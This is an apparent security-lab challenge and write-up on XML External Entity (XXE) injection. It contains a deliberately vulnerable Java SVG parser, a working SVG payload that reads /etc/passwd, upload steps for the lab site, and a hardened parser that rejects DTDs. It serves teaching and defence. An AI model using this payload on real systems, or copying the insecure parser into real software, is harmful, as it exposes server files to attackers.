[Challenge]

The purpose of this challenge is to demonstrate the programming flaw: "Improper Restriction of XML External Entity Reference ('XXE')".
To prevent users from uploading malicious files as demonstrated in the previous challenge the developers are now saving the files to a database and rendering them into the page. Plus they also parse them to make sure they are valid XML. Your task is to get the avatar to display the contents of the /etc/passwd file.

Here's the code that parses the SVG:

import java.io.IOException;
import java.io.StringBufferInputStream;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.w3c.dom.Document;
import org.xml.sax.SAXException;

public static Document parseXML(String xml) throws SAXException, IOException, ParserConfigurationException {
    // Factory left at its defaults: DOCTYPE declarations are accepted and external
    // entities are resolved and expanded, which is the XXE flaw this challenge shows.
    DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();

    DocumentBuilder builder = factory.newDocumentBuilder();

    // StringBufferInputStream is deprecated (it keeps only the low byte of each char);
    // parse() expands any &xxe; reference while building the DOM.
    Document doc = builder.parse(new StringBufferInputStream(xml));
    doc.getDocumentElement().normalize();
    return doc;
}

[Challenge Description]

  This challenge has the program check that the uploaded SVG file's content is well-formed XML, to stop a hacker from uploading a file containing malicious code. A vulnerability remains, however: the hacker can use an XXE attack to read a sensitive credential file. The task is to embed, in the XML-format SVG file being uploaded, a reference to the contents of the server's /etc/passwd file, and then upload that file to the server.

[Vulnerability Hint]
    The software processes an XML document that can contain XML entities with URIs that resolve to documents outside of the intended sphere of control, causing the product to embed incorrect documents into its output.

From MITRE CWE-611

  In XML we can specify the DTD source that the document references, so that the program can use it to parse the XML structure. Because of this, imagine replacing that DTD source with a sensitive file on the server and then, in some element of the XML, outputting the content of the referenced DTD entity: we would see the sensitive file's contents. This challenge asks us to upload an XML-format SVG file with exactly that kind of content. Use the supplementary explanation of XXE below to work out how to design the contents of such a file:
About XXE

XML External Entity is exploited through DTDs (Document Type Definitions).

DTDs allow the creation of XML entities. XML Entities are variables that can be assigned a string value when the XML document gets processed.

The entity values could be configured with values external to the document, such as in the example below. This is where the XML External Entity name comes from.

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "file:///var/www/myapp/welcome.txt">]>
<svg width="100" height="100">
<text x="10" y="20" fill="red">&xxe;</text>
</svg>
[Solution]

  1. Open the page: https://insecureinctm.us-east-1.elasticbeanstalk.com/cwe611.jsp
  2. Log in with the demo account.
  3. Prepare an XXE.svg file with the following content:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<svg width="100" height="100">
<text x="10" y="20" fill="red">&xxe;</text>
</svg>

  4. Upload the XXE.svg file.
  5. Confirm that the page now displays the sensitive contents of the /etc/passwd file.

[Security Principle]

  An XXE attack abuses XML's ability to reference external files: it references a sensitive file and then relies on the application rendering the result on the page. XXE is prevented by disabling DTD processing or XML external entity resolution in the parser.
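As an added example (not the challenge's own code), here is a hardened counterpart of the parseXML() method shown above: it keeps the same signature but configures DocumentBuilderFactory so that the DOCTYPE in XXE.svg is rejected before any entity can be resolved. The class name SafeSvgParser and the sample payload in main() are constructed for this illustration.

```java
import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.nio.charset.StandardCharsets;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.w3c.dom.Document;
import org.xml.sax.SAXException;

public class SafeSvgParser {

    // Same signature as the challenge's parseXML(), but with DTD/entity handling disabled.
    public static Document parseXML(String xml)
            throws SAXException, IOException, ParserConfigurationException {
        DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();

        // Primary defence: refuse any DOCTYPE, so no entity (internal or external) can be declared.
        factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        // Defence in depth, for deployments that must keep DOCTYPEs enabled:
        factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
        factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        factory.setXIncludeAware(false);
        factory.setExpandEntityReferences(false);
        // JAXP 1.5+ properties: forbid external DTD/schema access over every protocol.
        factory.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, "");
        factory.setAttribute(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");

        DocumentBuilder builder = factory.newDocumentBuilder();
        // Explicit charset instead of the deprecated StringBufferInputStream.
        Document doc = builder.parse(new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
        doc.getDocumentElement().normalize();
        return doc;
    }

    public static void main(String[] args) throws Exception {
        // Constructed sample with the same shape as the challenge's XXE.svg.
        String xxe = "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n"
            + "<!DOCTYPE svg [ <!ENTITY xxe SYSTEM \"file:///etc/passwd\">]>\n"
            + "<svg width=\"100\" height=\"100\"><text x=\"10\" y=\"20\">&xxe;</text></svg>";
        try {
            parseXML(xxe);
            System.out.println("unexpected: DOCTYPE was accepted");
        } catch (SAXException e) {
            // Expected: the parser stops at the DOCTYPE, so /etc/passwd is never opened.
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

A plain SVG without a DOCTYPE still parses normally, so the validity check the developers wanted is preserved while the entity expansion path is closed.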

Monday, February 25, 2019
